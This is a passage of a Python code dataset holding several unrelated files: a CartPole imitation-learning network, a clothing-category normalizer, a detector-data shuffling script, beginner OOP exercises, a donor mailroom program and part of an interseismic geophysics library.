100\n\n\ndef generate_trajectories_from_expert_policy(env, n_trajectories=100):\n trajectories = []\n rewards_list = []\n for _ in range(n_trajectories):\n state = env.reset()\n trajectory = []\n rewards = 0\n for _ in range(TRANSITION):\n if state[2] < 0: # pole angle is minus(left)\n if state[3] < 0: # pole velocity is minus(left) => bad situation.\n action = 0 # go left\n else: # pole velocity is plus(right) => good situation.\n action = env.action_space.sample()\n else: # pole angle is plus(right)\n if state[3] < 0: # pole velocity is minus(left) => good situation.\n action = env.action_space.sample()\n else:\n action = 1 # go right\n next_state, reward, done, info = env.step(action)\n trajectory.append([state, action, reward, next_state, done])\n state = next_state\n rewards += 1\n if done:\n rewards_list.append(rewards)\n break\n # for j\n trajectories.append(trajectory)\n # for i\n print(\"expert policy average reward : {}\".format(sum(rewards_list)/n_trajectories))\n return trajectories\n\n\n\nclass DeepActionNetwork:\n \"\"\" Deep Action(Q) Network\n predict action from state\n\n loss : square(q_pred(s) - q(s, true_a)(=1) )\n \"\"\"\n def __init__(self,\n feature_op,\n state_size=4,\n action_size=2,\n n_h1=20,\n n_h2=9,\n learning_rate=0.05,\n scope=\"deep_action\"\n ):\n self.sess = tf.Session()\n self.feature_op = feature_op\n assert self.feature_op in [\"h1\", \"h2\", \"pred\"]\n self.learning_rate = learning_rate\n self.state_size = state_size\n self.action_size = action_size\n self.n_h1 = n_h1\n self.n_h2 = n_h2\n self.scope = scope\n self.meta_name = \"dan_cartpole_Nh1{}_Nh2{}.meta\".format(n_h1, n_h2)\n print(\"meta_name : {}\".format(self.meta_name))\n if self.isRestore():\n self.saver = tf.train.import_meta_graph(self.meta_name)\n self.saver.restore(self.sess, self.meta_name[:-5])\n self._load_network()\n else:\n theta = self._build_network()\n init_new_vars_op = tf.variables_initializer(theta)\n self.sess.run(init_new_vars_op)\n 
#self.sess.run(tf.global_variable_initializer())\n\n def _build_network(self):\n with tf.variable_scope(self.scope):\n self.state_input = tf.placeholder(tf.float32, [None, self.state_size], name=\"state_input\")\n self.action = tf.placeholder(tf.int32, [None], name=\"action\")\n self.fc1 = tf_utils.fc(self.state_input, self.n_h1, scope=\"fc1\",\n activation_fn=tf.nn.relu,\n initializer=tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_IN\"))\n self.fc1_softmax = tf.nn.softmax(self.fc1, name=\"fc1_softmax\")\n self.fc2 = tf_utils.fc(self.fc1, self.n_h2, scope=\"fc2\",\n activation_fn=tf.nn.relu,\n initializer=tf.contrib.layers.variance_scaling_initializer(mode=\"FAN_IN\"))\n self.fc2_softmax = tf.nn.softmax(self.fc2, name=\"fc2_softmax\")\n self.q_value = tf_utils.fc(self.fc2, self.action_size, scope=\"q_value\", activation_fn=None)\n\n self.action_pred = tf.nn.softmax(self.q_value, name=\"action_prediction\")\n self.action_target = tf.one_hot(self.action, self.action_size, on_value=1.0, off_value=0.0,\n name=\"action_target\")\n self.loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.action_target,\n logits=self.action_pred, name=\"loss\")\n #self.loss = tf.reduce_mean(tf.square(tf.subtract(self.action_pred, self.action_target)))\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate, name=\"optimizer\")\n self.train_op = self.optimizer.minimize(self.loss, global_step=tf.train.get_global_step(),\n name=\"train_op\")\n new_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.scope)\n return new_variables\n\n def _load_network(self):\n graph = tf.get_default_graph()\n nodes = graph.as_graph_def().node\n #for node in nodes:\n # print(node.name)\n #ops = graph.get_operations()\n #for op in ops:\n # print(op.name)\n self.state_input = graph.get_tensor_by_name(\"deep_action/state_input:0\")\n self.action = graph.get_tensor_by_name(\"deep_action/action:0\")\n self.fc1 = graph.get_tensor_by_name(\"deep_action/fc1/Relu:0\")\n 
self.fc1_softmax = graph.get_tensor_by_name(\"deep_action/fc1_softmax:0\")\n self.fc2 = graph.get_tensor_by_name(\"deep_action/fc2/Relu:0\")\n self.fc2_softmax = graph.get_tensor_by_name(\"deep_action/fc2_softmax:0\")\n self.q_value = graph.get_tensor_by_name(\"deep_action/q_value/Add:0\")\n self.action_pred = graph.get_tensor_by_name(\"deep_action/action_prediction:0\")\n self.action_target = graph.get_tensor_by_name(\"deep_action/action_target:0\")\n self.loss = graph.get_tensor_by_name(\"deep_action/loss:0\")\n #self.optimizer = graph.get_tensor_by_name(\"deep_action/optimizer:0\")\n self.train_op = graph.get_operation_by_name(\"deep_action/train_op\")\n\n def isRestore(self):\n if False:\n #if os.path.exists(self.meta_name):\n return True\n else:\n return False\n\n def _num_basis(self):\n return self.n_h2\n\n def learn(self, expert_trajectories=None):\n \"\"\" training from expert_trajectories \"\"\"\n\n if expert_trajectories is None:\n env = gym.make(\"CartPole-v0\")\n expert_trajectories = generate_trajectories_from_expert_policy(env, n_trajectories=100)\n\n expert_trajs_flat = []\n for i in range(len(expert_trajectories)):\n for j in range(len(expert_trajectories[i])):\n expert_trajs_flat.append(expert_trajectories[i][j])\n random.shuffle(expert_trajs_flat)\n\n batch_end = 0\n for i in range(NUM_ACTION_ITER):\n if batch_end + BATCH_SIZE > len(expert_trajs_flat):\n batch_end = 0\n random.shuffle(expert_trajs_flat)\n batch_expert_trajs = expert_trajs_flat[batch_end:batch_end+BATCH_SIZE]\n cur_state_batch = [s[0] for s in batch_expert_trajs]\n cur_action_batch = [s[1] for s in batch_expert_trajs]\n loss, _ = self.sess.run([self.loss, self.train_op], feed_dict={self.state_input:cur_state_batch,\n self.action:cur_action_batch})\n batch_end += BATCH_SIZE\n if i % 10 == 0:\n if type(loss) == np.float32:\n print(\"Deep Action Network Training iteration {}, {}\".format(i, loss))\n else:\n print(\"Deep Action Network Training iteration {}, {}\".format(i, 
sum(loss)/BATCH_SIZE))\n\n print(\"saveing our trained weights!!\")\n self.saver = tf.train.Saver()\n self.saver.save(self.sess, \"./\" + self.meta_name[:-5])\n\n def get_optimal_action(self, state):\n actions = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n return actions.argmax()\n\n def get_q_value(self, state):\n q_value = self.sess.run(self.q_value, feed_dict={self.state_input: [state]})\n return q_value\n\n def get_action_pred(self, state):\n action_pred = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n #q_value = self.sess.run(self.q_value, feed_dict={self.state_input: [state]})\n return action_pred\n\n def get_features(self, state):\n if self.feature_op == 'pred':\n features = self.sess.run(self.action_pred, feed_dict={self.state_input: [state]})\n elif self.feature_op == 'h2':\n features = self.sess.run(self.fc2_softmax, feed_dict={self.state_input: [state]})\n elif self.feature_op == 'h1':\n features = self.sess.run(self.fc1_softmax, feed_dict={self.state_input: [state]})\n return features\n\n def get_feature_dim(self):\n if self.feature_op == 'pred':\n return self.action_size\n elif self.feature_op == 'h2':\n return self.n_h2\n elif self.feature_op == 'h1':\n return self.n_h1\n \n def evaluate_multi_states(self, state):\n \"\"\" get features's multiple version\n \"\"\"\n if self.feature_op == 'pred':\n features = self.sess.run(self.action_pred, feed_dict={self.state_input: state})\n elif self.feature_op == 'h2':\n features = self.sess.run(self.fc2_softmax, feed_dict={self.state_input: state})\n elif self.feature_op == 'h1':\n features = self.sess.run(self.fc1_softmax, feed_dict={self.state_input: state})\n return features\n\n def test(self, env, isRender=True, num_test=100):\n print(\"Testing Deep Action Network... 
{} times\".format(num_test))\n timesteps = []\n for i in range(num_test):\n cur_state = env.reset()\n done = False\n t = 0\n while not done:\n t = t + 1\n if isRender:\n env.render()\n action = self.get_optimal_action(cur_state)\n next_state, reward, done, _ = env.step(action)\n cur_state = next_state\n if done:\n print(\"Test DAN {} : {} timesteps\".format(i, t))\n timesteps.append(t)\n break\n print(\"DAN average test results : {}\".format(sum(timesteps)/num_test))\n #end while\n #end for i\n \n","sub_path":"legacy_folder/deep_action_network.py","file_name":"deep_action_network.py","file_ext":"py","file_size_in_byte":10518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2040141","text":"import pandas as pd\nimport os\n\ndef transform_big_categories_to_uniform(is_show=True):\n '''\n Returns\n -------\n similar_categories : \n key: big-category for classification\n value: big-category(defined by supplier) defined by administrator,\n as the subordinate under the key (not very crucial for classification)\n\n is_show=True: 印出流程 is_show=True: 不印出流程\n\n This func would use other funcs:\n 1) _generate_paths\n 2) _get_raw_categories,\n 3) _get_splitted_categories,\n 4) _get_unclassified_categories,\n 5) _print_unclassified_categories\n\n By adjusting list: 'manual_def_categories' and dict: 'manual_def_dict' humanly,\n it can finally make up the dict: 'similar_categories',\n which contains the useful categories for classification as the key,\n and some useless categories as the value.\n '''\n # key: 自訂統一 big category 詞彙 value: 各家供應商 big category 詞彙\n\n raw_categories = _get_raw_categories()\n splitted_set = _get_splitted_categories(raw_categories)\n\n # Cleasing the whole big-categories to a dict which key of the dict is A ARBITRARY CATEGORY in a cluster of similar categories\n # 註: manual_def_categories 中分類的取名後方不加\"類\"(執行後結果會自動加上後字\"類\"),否則會有冗餘分類\n\n manual_def_categories = 
[\"上衣\",\"襯衫\",\"內衣\",\"外套\",\n\t\t\t\t\t\t \"下身\",\"配件\",\"洋裝\",\"運動\",\n\t\t\t\t\t\t \"鞋\",\"童裝\",\"嬰幼兒\",\"孕婦\"]\n\n manual_def_dict = {\"上衣\":{\"毛衣\",\"大衣\",\"針織衫\"},\n \t\t\t\t \"內衣\":{\"內著\",\"家居\",\"家居服\",\n \t\t\t\t\t\t \"家居類\",\"内衣\"},\n \t\t\t\t \"外套\":{\"外套類\",\"外套夾克\",\"外套\"},\n \t\t\t\t \"配件\":{\"皮夾\",\"絲巾\",\"圍巾\",\n \t\t\t\t\t\t \"皮帶\",\"帽子\",\"飾品\",\n \t\t\t\t\t\t \"包包\",\"其他\"},\n \t\t\t\t \"下身\":{\"連身褲\",\"裙子\"},\n \t\t\t\t \"童裝\":{\"kids_boy\",\"kids_girl\"},\n \t\t\t\t \"嬰幼兒\":{\"baby_girl\",\"baby_boy\"}}\n '''\n\n # 測試\n manual_def_categories = [\"上衣\",\"襯衫\",\"內衣\",\"外套\",\n \"嬰幼兒\",\"孕婦\",\"配件\"]\n manual_def_dict = {\"上衣\":{\"毛衣\",\"大衣\",\"針織衫\"},\n \t\t\t\t \"內衣\":{\"內著\",\"家居\",\"家居服\",\n \t\t\t\t\t\t \"家居類\",\"内衣\"},\n \"嬰幼兒\":{\"baby_boy\",\"baby_girl\"},\n \"配件\":{\"絲巾\",\"包包\",\"皮夾\"}}\n '''\n\n #tmp_cats = [cat.replace(\"類\",\"\") for cat in manual_def_categories]\n # (1) 先利用 manual_def_categories 設計出階層式的 similar_categories 雛形\n similar_categories = {f\"{key}類\": set([cat for raw_cat in raw_categories for cat in raw_cat.split(\"/\") if cat in key or key in cat]) for key in manual_def_categories}\n if is_show:\n print(\"===\"*12, \"\\n\", \"1. similar_categories 設計雛形 (依照手工添加的 manual_def_categories 所設計)\", \"===\"*12)\n print(\"similar_categories:\\n\", similar_categories, \"\\n\", sep='')\n\n # 印出查看目前尚未歸類的粗分類\n unclassified_cats = _get_unclassified_categories(splitted_set, similar_categories)\n if is_show:\n _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats)\n\n # (2) 再透過 manual_def_dict 補償修正:「??廠商分類 應分在 ??自訂分類下(作為子分類)」\n if is_show:\n print(\"===\"*12, \"\\n\", \"2. 
歸類補償修正後 (依照手工添加的 manual_def_dict) 補償修正\", \"===\"*12, sep='')\n #for manual_main_cat, manual_sub_cat in manual_def_dict.items():\n for unclassified_cat in unclassified_cats:\n #print(f\"\\\"{unclassified_cat}\\\"\", end=\" \")\n for manual_main_cat, manual_sub_cats in manual_def_dict.items():\n for manual_sub_cat in manual_sub_cats:\n #print(manual_sub_cat)\n if unclassified_cat in manual_sub_cat:\n #similar_categories[manual_main_cat].add(manual_sub_cat)\n similar_categories[f\"{manual_main_cat}類\"].add(manual_sub_cat)\n if is_show:\n print(\"similar_categories:\\n\", similar_categories, \"\\n\", sep='')\n\n '''tmp_cats = [cat.replace(\"類\",\"\") for cat in manual_def_categories]\n for raw_cat in raw_categories:\n if raw_cat in tmp_cats:\n print(similar_categories,\"\\n\\n\")\n '''\n # 印出查看目前尚未歸類的粗分類\n unclassified_cats = _get_unclassified_categories(splitted_set, similar_categories)\n if is_show:\n _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats)\n\n # 若確定 similar_categories 正確,回傳 similar_categories\n return similar_categories\n\ndef _generate_paths():\n # Generate clear path of CSV files for all cloth suppliers\n base_path_1 = \"D:/MyPrograms/Clothes2U/functions/台灣服飾商 ETL/Lativ_Crawler/res2/tier_1.csv\"\n base_path_2 = \"D:/MyPrograms/Clothes2U/functions/台灣服飾商 ETL/Supplier_DB_crawler_v2/output/tier1/csv/\"\n csv_file_names = os.listdir(base_path_2)\n csv_paths = [base_path_1] + [base_path_2+csv_fn for csv_fn in csv_file_names if \"H&M\" not in csv_fn]\n #print(*(f\"({i+1}) {path}\" for i, path in enumerate(csv_paths)), len(csv_paths), \"\\n\", sep=\"\\n\")\n return csv_paths\n\ndef _get_raw_categories():\n # Read all big-categories and put them to 'tmp_list'\n raw_categories = set(category for csv_path in _generate_paths() for category in pd.read_csv(csv_path)[\"category\"])\n #print(raw_categories, len(raw_categories), \"\\n\") # 48=>39( list => set ), 9 duplicated categorie names\n return raw_categories\n\ndef 
_get_splitted_categories(raw_categories):\n # Splitting some compound categories (which combines many types) into single-term categories\n spliter = \"/\"\n splitted_set = set()\n for cat in raw_categories:\n cat = cat.replace(\"・\",\"/\").replace(\"&\",\"/\")\n if spliter in cat:\n #print(cat.replace(\"&\",\"/\").split(\"/\"))\n [splitted_set.add(cat) for cat in cat.split(\"/\")]\n else:\n splitted_set.add(cat)\n #print(splitted_set, len(splitted_set), \"\\n\") # 39=>43, 4 additional categories appended after splitting categories which combines many types\n return splitted_set\n\ndef _get_unclassified_categories(splitted_set, similar_categories):\n # 回傳當前尚未歸類(進 similar_categories)的粗分類到 existing_cats\n unclassified_cats = splitted_set - set(cat for v in similar_categories.values() for cat in v)\n return unclassified_cats\n\ndef _print_unclassified_categories(splitted_set, similar_categories, unclassified_cats):\n #print(\"existing_cats:\\n\", existing_cats, \"\\n\", sep='')\n\n # 印出查看目前尚未歸類的粗分類\n # 手動確認要增設哪些分類後,可增加自訂新分類到 manual_def_categories\n # 或是增加自訂新從屬階層到 manual_def_dict\n print(\"執行本階段後,尚未歸類的粗分類:\")\n if len(unclassified_cats) > 0:\n print(*(f\"\\'{cat}\\'\" for cat in unclassified_cats), \"\\n\", sep=\"/\")\n else:\n print(\"無\")\n#-----------------------------\ndef get_main_categories(is_show=True):\n '''\n Returns\n -------\n list(similar_categories.keys()): \n\n This func only use 1 other func: 'transform_big_categories_to_uniform'\n to obtain uniform, upper-level categories,\n as the role of FEATURES to help to train classification model.\n '''\n similar_categories = transform_big_categories_to_uniform(is_show)\n #print(similar_categories)\n return list(similar_categories.keys())\n\ndef list_all_combination(is_show=False):\n clothing_color_path = \"./local_data/color_sheet.txt\"\n colors = list()\n with open(clothing_color_path, \"r\") as fp:\n [colors.append(color) for line in fp.readlines()[1:] for color in line.rstrip().split(\":\")[-1].split(\"、\")]\n 
#print(colors)\n\n main_categories = get_main_categories(is_show=False)\n #print(main_categories)\n\n # 12 categories x 12 colors => 144 sets\n train_feature_combination = [f\"{color}色_{cat}\" for color in colors for cat in main_categories]\n #print(train_feature_combination)\n\n if is_show:\n for i, color_cat in enumerate(train_feature_combination):\n print(f\"{str(i).zfill(6)}_{color_cat}\")\n return train_feature_combination\n\ndef write_all_combination_to_txt():\n train_feature_combination = list_all_combination(is_show=False)\n color_cat_combination_path = \"./local_data/color_category_combination.txt\"\n try:\n with open(color_cat_combination_path, \"w\") as fp:\n tmp = len(train_feature_combination)-1\n for i, color_cat in enumerate(train_feature_combination):\n #print(f\"{str(i).zfill(6)}_{color_cat}\")\n msg = f\"{str(i).zfill(6)}_{color_cat}\"\n msg += \"\\n\" if i != tmp else \"\"\n fp.write(msg)\n\n except Exception as e:\n print(f\"'顏色_服飾分類'txt檔: {color_cat_combination_path} 寫入失敗:\")\n print(str(e))\n else:\n print(f\"'顏色_服飾分類'txt檔: {color_cat_combination_path} 寫入成功!\")\n\ndef query_uniform_category(supplier_category):\n uniform_category = None\n similar_categories = transform_big_categories_to_uniform(False)\n #print(similar_categories)\n for uniform, mixed in similar_categories.items():\n #print(mixed)\n if supplier_category in mixed:\n uniform_category = uniform\n if uniform_category is None:\n print(\"[WARNING] 請檢查程式: `./modules/supplier_utils/uniform_category_transformer.py`\"+\\\n f\"找不到與供應商分類 `{supplier_category}`相應的「統一分類」\")\n return uniform_category \n \nif __name__ == \"__main__\":\n ''' 功能 1: 歸納整理各服飾供應商服飾(粗)分類 '''\n #main_categories = get_main_categories(is_show=True) #顯示過程\n #main_categories = get_main_categories(is_show=False) #不顯示過程\n #print(\"\\n\", \"===\"*12, \"\\n\", \"用來訓練所有的上層分類\", \"===\"*12, \"\\n\", main_categories, \"\\n\", len(main_categories), sep='')\n\n ''' 功能 2: 由特定服飾商 `粗分類` 查詢 `自訂統一分類` '''\n supplier_category = \"配件\"\n 
print(query_uniform_category(supplier_category))\n\n ''' 功能 3: 列出所有:'顏色_服飾分類'的排列組合,作為查詢關鍵字的輸入\n (E.g., Azure-API 呼叫 => 到 Bing 搜尋 => 送 request 存圖)'''\n\n #list_all_combination(is_show=True)\n\n ''' 功能 4: 儲存所有:'顏色_服飾分類'的排列組合 (不含紀錄) 為 txt檔 '''\n #write_all_combination_to_txt()\n","sub_path":"modules/supplier_utils/uniform_category_transformer.py","file_name":"uniform_category_transformer.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473439716","text":"#!/usr/bin/env python\n\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jifu Zhao\n\"\"\"\n\nimport scipy.io as sio\nfrom signal_functions import randomShuffle\n\n#%% load the data for 30 second from \"./../data/\"\n# backfor30s = 1000back30s, 500backFinal30s, 500back1ThFar30s, 500back1Th30s, 500back2Th30s, \n# 500back1Ra30s, 500back2Ra30s, 500back1U30s, 500back2U30s, 500back1K30s, 500back2K30s\n\nbackfor30s = sio.loadmat('./../data/backfor30s')['backfor30s'] #6000\n\n# shuffle background for 30s (repeated for 3 times)\nback30Shuffled = randomShuffle(backfor30s, dimension=2)\nback30Shuffled = randomShuffle(back30Shuffled, dimension=2)\nback30Shuffled = randomShuffle(back30Shuffled, dimension=2)\n\n# select 80% as train and 20% as test\ntrain30, test30 = randomShuffle(back30Shuffled, dimension=2, delta=0.8)\n\n# save the data\n#sio.savemat('./../data/back30Shuffled.mat', {'back30Shuffled': back30Shuffled})\n#sio.savemat('./../data/train30.mat', {'train30': train30})\n#sio.savemat('./../data/test30.mat', {'test30': test30})\n\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# load the data for 60 second from \"./../data/\"\nbackfor60s = sio.loadmat('./../data/backfor60s')['backfor60s'] #6000\n\n# shuffle background for 60s (repeated for 3 times)\nback60Shuffled = randomShuffle(backfor60s, dimension=2)\nback60Shuffled = randomShuffle(back60Shuffled, dimension=2)\nback60Shuffled = 
randomShuffle(back60Shuffled, dimension=2)\n\n# select 80% as train and 20% as test\ntrain60, test60 = randomShuffle(back60Shuffled, dimension=2, delta=0.8)\n\n# save the data\n#sio.savemat('./../data/back60Shuffled.mat', {'back60Shuffled': back60Shuffled})\n#sio.savemat('./../data/train60.mat', {'train60': train60})\n#sio.savemat('./../data/test60.mat', {'test60': test60})\n\n\n","sub_path":"NaI_detector_data/data_process/data_shuffle.py","file_name":"data_shuffle.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"178101871","text":"### 1.\nimport random\nclass Num:\n num_lst = []\n def random_num(self):\n for i in range(10):\n self.num_lst.append(random.randint(100,999))\n\nclass OutputNum(Num):\n def __init__(self):\n self.random_num()\n\n def output_num(self):\n for i in self.num_lst:\n print(i)\nobj = OutputNum()\nobj.output_num()\n\n\n### 2.\nclass School:\n def __init__(self,name,address):\n self.name = name\n self.address = address\n self.teacher_list = []\n\n def add_teacher(self,obj):\n self.teacher_list.append(obj)\n\nclass Teacher:\n def __init__(self,name,course,school):\n self.name = name\n self.course = course\n self.school = school\n\n\nbeijing = School(\"北京校区\",\"美丽的沙河\")\nshenzhen = School(\"深圳校区\",\"南山区\")\n\ntaibai = Teacher(\"太白\",\"python\",beijing)\nwuchao = Teacher(\"吴超\",\"linux\",beijing)\nbaoyuan = Teacher(\"宝元\",\"python\",beijing)\nyuanhao = Teacher(\"苑昊\",\"python\",shenzhen)\nxiaohu = Teacher(\"小虎\",\"linux\",shenzhen)\nxiaowang = Teacher(\"小王\",\"python\",shenzhen)\n\nbeijing.add_teacher(taibai)\nbeijing.add_teacher(baoyuan)\nbeijing.add_teacher(wuchao)\nshenzhen.add_teacher(yuanhao)\nshenzhen.add_teacher(xiaowang)\nshenzhen.add_teacher(xiaohu)\n\n\n\n## 1.1\ntaibai_dic = {\"name\":taibai.name,\"course\":taibai.course,\"school\":taibai.school.name,\"school_address\":taibai.school.address}\nprint(taibai_dic)\n\n## 1.2\nbeijing_teacher = 
[i.name for i in beijing.teacher_list]\nprint(beijing_teacher)\n\n## 1.3\npython_teacher = [i for i in beijing.teacher_list if i.course == \"python\"] + [i for i in shenzhen.teacher_list if i.course == \"python\"]\nprint(python_teacher)\n\n## 1.4\nlinux_teacher = [i for i in beijing.teacher_list if i.course == \"linux\"] + [i for i in shenzhen.teacher_list if i.course == \"linux\"]\nfor i in linux_teacher:\n print(i)\n\n## 1.5\nimport pickle\nwith open(\"txt\",mode=\"ab\") as f:\n pickle.dump(beijing,f)\n pickle.dump(shenzhen,f)\n\nwith open(\"txt\",mode=\"rb\") as f1:\n while True:\n try:\n obj = pickle.load(f1)\n for i in obj.teacher_list:\n print(i.name)\n except Exception as e:\n break\n\n\n### 3.\nclass People:\n def __init__(self,name,hp,weapon,sex):\n self.name = name\n self.hp = hp\n self.weapon = weapon\n self.sex = sex\n\n\nclass Police(People):\n def attack(self,obj):\n if not isinstance(obj,Police):\n print(f\"警察:{self.name} 用{self.weapon}攻击匪徒:{obj.name},匪徒:{obj.name} 掉血\")\n\nclass Terrorist(People):\n def attack(self,obj):\n if not isinstance(obj,Terrorist):\n print(f\"匪徒:{self.name} 用{self.weapon}攻击警察:{obj.name},警察:{obj.name} 掉血\")\n\na1 = Police(\"xxx\",100,\"手枪\",\"男\")\na2 = Police(\"sss\",100,\"狙击枪\",\"女\")\nb1 = Terrorist(\"yyy\",100,\"冲锋枪\",\"男\")\nb2 = Terrorist(\"ooo\",100,\"步枪\",\"女\")\n\na1.attack(b1)\na1.attack(a2)\nb2.attack(b1)\n","sub_path":"测试/测试三/刘桂祥.py","file_name":"刘桂祥.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61356239","text":"#!/usr/bin/env python3\n\nimport re\n\ndonors = {'Bob Barker': {'donations': 2, 'total': 24456.24},\n 'Roger Rabbit': {'donations': 1, 'total': 4930.26},\n 'Bruce Lee': {'donations': 3, 'total': 52246.75},\n 'Frodo Baggins': {'donations': 1, 'total': 1249.44},\n 'Kermit the Frog': {'donations': 2, 'total': 23475.20}}\n\n# prints a main menu\ndef show_main_menu():\n print(\"-\" * 70)\n for number, func 
in menu_opts.items():\n print(f'{number}. {menu_opts_text[func]}')\n\n# gets a menu selection\ndef get_main_selection():\n user_in = \"\"\n while user_in == \"\":\n show_main_menu()\n user_in = input(\"Enter a menu number: \")\n if user_in not in menu_opts.keys():\n print(\"Invalid selection. Enter a menu selection:\", list(menu_opts.keys()))\n user_in = \"\"\n return user_in\n\n# logic for inputting a new donation\ndef send_thankyou():\n user_in = \"\"\n names = list(donors.keys())\n while user_in == \"\":\n print(\"----------------------------------------------------------------\")\n user_in = input(\"Enter a full name or type 'list' for a list of names: \")\n if user_in == 'list':\n print(\"Donors: \")\n for name in names:\n print(\" \" + name)\n user_in = \"\"\n elif user_in not in names:\n donors[user_in] = {'donations': 0, 'total': 0}\n amount = float(input(\"Enter a donation amount: \"))\n donors[user_in]['donations'] += 1\n donors[user_in]['total'] += amount\n output_thankyou(user_in, amount)\n\n# print a report\ndef output_report():\n table_headerfmt = \"{:<19s}|{:>15s} |{:>14s} |{:>15s}\"\n table_formatter = \"{:<19s} ${:13.2f} {:14d} ${:13.2f}\"\n table_seperator = \"-\" * 68\n print(table_headerfmt.format(\"Donor Name\", \"Total Given\", \"Num Gifts\", \"Average Gift\"))\n print(table_seperator)\n\n # unpack to a list of lists\n donor_list = []\n for donor in donors:\n donor_list.insert(0, [donor, donors[donor]['donations'], donors[donor]['total']])\n\n # sort the list\n donor_list = sorted(donor_list, key = lambda x: x[2] * -1)\n\n # print the list\n for donor in donor_list:\n print(table_formatter.format(donor[0], donor[2], donor[1], donor[2] / donor[1]))\n\n# print a thank you for a recent donation\ndef output_thankyou(donor_name, latest_amount):\n print(generate_thankyou(donor_name, latest_amount, True))\n\n# write a thank you note to disk for a donor\ndef write_letters():\n for donor_name in donors.keys():\n # convert any non-alphanumeric 
characters to _ for the filename\n donor_file = re.sub(r\"[^a-zA-Z0-9_-]+\", \"_\", donor_name) + \".txt\"\n\n note = generate_thankyou(donor_name)\n f = open(donor_file, 'w')\n f.write(note)\n f.close()\n print(f'>>> Wrote thank you note for {donor_name} to {donor_file}')\n\n# generate a thank you note for a donor\ndef generate_thankyou(donor_name, latest_amount=0, recent=False):\n donations_total = donors[donor_name][\"total\"]\n donations_count = donors[donor_name][\"donations\"]\n format_values = {'donations_total': donations_total,\n 'donations_count': donations_count,\n 'donor_name': donor_name,\n 'latest_amount': latest_amount}\n if recent:\n template = '''----------------------------------------------------------------------\nDear {donor_name},\n Thank you for your generous donation of {latest_amount:.2f}!\nThat brings your total of {donations_count} donation(s) to ${donations_total:.2f}\nSincerely,\n -Me\n'''\n else:\n template = '''----------------------------------------------------------------------\nDear {donor_name},\n Thank you for all {donations_count} of your generous donations for a total of {donations_total:.2f}!\nWe will put the money to good use.\nSincerely,\n -Me\n'''\n letter = template.format(**format_values)\n return(letter)\n\n# the main loop\ndef main():\n selection = \"2\"\n while menu_opts[selection] != quit:\n selection = get_main_selection()\n menu_opts[selection]()\n\n# a dict for mapping user selection to functions\nmenu_opts = {'1': send_thankyou,\n '2': output_report,\n '3': write_letters,\n '4': quit}\nmenu_opts_text = {send_thankyou: \"Send a Thank You to a single donor.\",\n output_report: \"Create a report.\",\n write_letters: \"Send letters to all donors.\",\n quit: \"Quit.\"}\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"students/aaron/homework_lesson4/mailroom_v2.py","file_name":"mailroom_v2.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"216249985","text":"#!/usr/bin/env python3\n'''\n## interseis_lib.py\n\nLibrary of python functions to be used with interseismic_practical.ipynb.\n\n'''\n\n# packages\nimport subprocess as subp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.path as path\n\n#-------------------------------------------------------------------------------\n\ndef screw_disc(x, s, d, c):\n '''\n Function to calculate displacements/velocities due to slip on a deep \n screw dislocation (infinitely long strike slip fault. \n After Savage and Burford (1973).\n v = (s/pi)*arctan(x/d)\n\n INPUTS\n x = vector of distances from fault\n s = slip or slip rate on deep dislocation\n d = locking depth [same units as x]\n c = scalar offset in y [same unit as s]\n OUTPUTS\n v = vector of displacements or velocities at locations defined by x\n [same units as s]\n \n USEAGE:\n v = deepdisloc(x, s, d)\n\n '''\n \n v = (s/np.pi) * np.arctan(x/d) + c\n \n return v\n\n\n#-------------------------------------------------------------------------------\n\ndef loglike(x, v, m, W):\n '''\n INPUTS\n x = vector of distances from fault\n v = velocities at locations defined by x\n m = model parameters, [0] = slip (mm/yr), [1] = locking depth (km), [2] = scalar offset (mm/yr)\n W = weight matrix (inverse of the VCM)\n OUTPUTS\n ll = value of the loglikelihood function\n '''\n \n m = m * np.array([0.001, 1000, 0.001])\n \n #ll = np.sum((np.transpose(v-screw_disc(x, m[0], m[1], m[2]))*W*(v-screw_disc(x, m[0], m[1], m[2]))));\n ll = np.sum(0.001*(np.transpose(v-screw_disc(x, m[0], m[1], m[2]))*W*(v-screw_disc(x, m[0], m[1], m[2]))));\n \n return ll\n\n#-------------------------------------------------------------------------------\n\ndef 
logprior(m,m_min,m_max):\n '''\n INPUTS\n m = model values\n m_min = lower model limits\n m_max = upper model limits\n OUTPUTS\n lp = true if within limits, false if any aren't\n '''\n \n lp = np.all(np.all(m>=m_min) & np.all(m<=m_max))\n \n return lp\n\n#-------------------------------------------------------------------------------\n\ndef rms_misfit(a,b):\n '''\n INPUTS\n a,b = two arrays of same length\n OUTPUTS\n rms = rms misfit between a and b (a-b)\n '''\n \n rms = np.sqrt(np.mean((a-b)**2))\n \n return rms\n\n#-------------------------------------------------------------------------------\n\ndef get_par(par_file,par_name):\n '''\n INPUTS\n par_file = name of param file (str)\n par_name = name of desired par (str)\n OUTPUTS\n par_val = value of param for par file\n '''\n \n par_val = subp.check_output(['grep', par_name, par_file]).decode().split()[1].strip()\n return par_val\n\n#-------------------------------------------------------------------------------\n\ndef profile_data(x,y,data,prof_start,prof_end,params):\n \n '''\n Generates a profile through gridded data.\n \n INPUTS:\n data = numpy array of values to profile\n x = vector of coords for the x axis\n 